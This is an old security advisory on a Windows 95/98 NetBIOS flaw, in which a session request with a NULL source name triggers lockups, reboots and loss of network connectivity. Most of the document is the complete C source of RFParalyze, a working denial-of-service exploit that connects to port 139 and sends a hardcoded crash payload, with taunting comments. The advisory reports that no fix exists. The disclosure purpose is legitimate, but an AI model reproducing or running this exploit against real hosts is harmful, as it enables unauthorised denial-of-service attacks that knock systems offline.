COMMAND

    NetBIOS

SYSTEMS AFFECTED

    Win 95/98

PROBLEM

    Following is based  on el8.org advisory  by  Evan  Brewer and Rain
    Forest Puppy.   Through a  netbios session  request packet  with a
    NULL source name, Windows 9[5,8]  show a number of odd  responses.
    Everything from lockups, reboots  and "the blue screen  of death",
    to total loss of network  connectivity.  Note that neither  el8 or
    wiretrip  discovered  the  vulnerability;  instead,  a binary-only
    exploit  found  in  the  wild  was reversed, and the demonstration
    code  attached  was  reconstructed.    So  it  should  be   noted:
    THIS HAS BEEN FOUND IN THE WILD.

    The  vulnerability  specificly  targets  the  Messenger service on
    Windows 9[5,8].   At this  point, it's  doubtful there's  anything
    more worthy than a DoS  capable.  However, any information  to the
    contrary would be appreciated.

    /* 	- el8.org advisory: RFParalyze.c
    
	    code by rain forest puppy <rfp@wiretrip.net>   -
   	    coolness exhibited by Evan Brewer <dm@el8.org> -
    
	    - Usage: RFParalyze <IP address> <NetBIOS name>
    
	    where <IP address> is the IP address (duh) of the target (note:
	    not DNS name).  <NetBIOS name> is the NetBIOS name (again, duh) of
	    the server at the IP address given.  A kiddie worth his scripts
	    should be able to figure out how to lookup the NetBIOS name.
	    Note: NetBIOS name must be in upper case.
    
	    This code was made from a reverse-engineer of 'whisper', a
	    binary-only exploit found in the wild.  It's by Marcy Abene.
    
	    I have only tested this code on Linux.  Hey, at least it's
	    not in perl... ;)   -rfp
    
    */
    
    #include <stdio.h>		/* It's such a shame to waste   */
    #include <stdlib.h>		/* this usable space. Instead,  */
    #include <string.h>		/* we'll just make it more      */
    #include <netdb.h>		/* props to the men and women   */
    #include <sys/socket.h>		/* (hi Tabi!) of #!adm and      */
    #include <sys/types.h>		/* #!w00w00, because they rock  */
    #include <netinet/in.h>		/* so much.  And we can't forget*/
    #include <unistd.h>		/* our friends at eEye or       */
    #include <string.h>		/* Attrition. Oh, +hi Sioda. :) */
    
    /* 	Magic winpopup message
	    This is from \\Beav\beavis and says "yeh yeh"
	    Ron and Marty should like the hardcoded values this has ;)
    */
    char blowup[]= "\x00\x00\x00\x41\xff\x53\x4d\x42\xd0\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x19\x00\x04\x42\x45\x41\x56\x00\x04\x42\x45\x41\x56\x49"
    "\x53\x00\x01\x08\x00\x79\x65\x70\x20\x79\x65\x70\x00\x00";
    
    struct sreq /* little structure of netbios session request */
            {
            char first[5];
            char yoname[32];
            char sep[2];
            char myname[32];
            char end[1];
            };
    
    void Pad_Name(char *name1, char *name2); /* Thanks Antilove/ADM 4 codez!*/
    
    int main(int argc, char *argv[]){
    char buf[4000], myname[33], yoname[33];
    struct sockaddr_in sin;
    int sox, connex, x;
    struct sreq smbreq;
    
    printf("RFParalyze -- this code by rfp/ADM/Wiretrip/ and dm/el8/\n");
    
    if (argc < 3) {
    printf("Usage: RFParalyze <IP of target> <NetBIOS name>\n");
    printf("       --IP must be ip address, not dns\n");
    printf("       --NetBIOS name must be in UPPER CASE\n\n");
    exit(1);}
    
    printf("Greetz to el8.org, Technotronic, w00w00, USSR, and ADM!\n");
    
    Pad_Name("WICCA",myname);  /* greetz to Simple Nomad/NMRC */
    myname[30]='A';	           /* how was Beltaine? :)        */
    myname[31]='D';
    
    Pad_Name(argv[2],yoname);
    yoname[30]='A';
    yoname[31]='D';
    printf("Trying %s as NetBIOS name %s \n",argv[1],argv[2]);
    
    sin.sin_addr.s_addr = inet_addr(argv[1]);
    sin.sin_family      = AF_INET;
    sin.sin_port        = htons(139);
    
    sox = socket(AF_INET,SOCK_STREAM,0);
    if((connex = connect(sox,(struct sockaddr_in *)&sin,sizeof(sin))) < 0){
        perror("Problems connecting: ");
        exit(1);}
    
    memset(buf,0,4000);
    
    memcpy(smbreq.first,"\x81\x00\x00\x44\x20",5); /*various netbios stuffz*/
    memcpy(smbreq.sep,"\x00\x20",2);               /*no need to worry about*/
    memcpy(smbreq.end,"\x00",1);                   /*what it does :)       */
    strncpy(smbreq.myname,myname,32);
    strncpy(smbreq.yoname,yoname,32);
    
    write(sox,&smbreq,72);  /* send initial request */
    x=read(sox,buf,4000);   /* get their response   */
    
    if(x<1){ printf("Problem, didn't get response\n");
            exit(1);}
    
    if(buf[0]=='\x82') printf("Enemy engaged, going in for the kill...");
    else {printf("We didn't get back the A-OK, bailing.\n");
            exit(1);}
    
    write(sox,&blowup,72);  /* send the magic message >:)     */
    x=read(sox,buf,4000);   /* we really don't care, but sure */
    close(sox);
    printf("done\n");
    }
    
    void Pad_Name(char *name1, char *name2)
    { char c, c1, c2;
      int i, len;
      len = strlen(name1);
      for (i = 0; i < 16; i++) {
        if (i >= len) {
         c1 = 'C'; c2 = 'A'; /* CA is a space */
        } else {
          c = name1[i];
          c1 = (char)((int)c/16 + (int)'A');
          c2 = (char)((int)c%16 + (int)'A');
        }
        name2[i*2] = c1;
        name2[i*2+1] = c2;
      }
      name2[32] = 0;   /* Put in the null ...*/
    }

SOLUTION

    Nothing yet.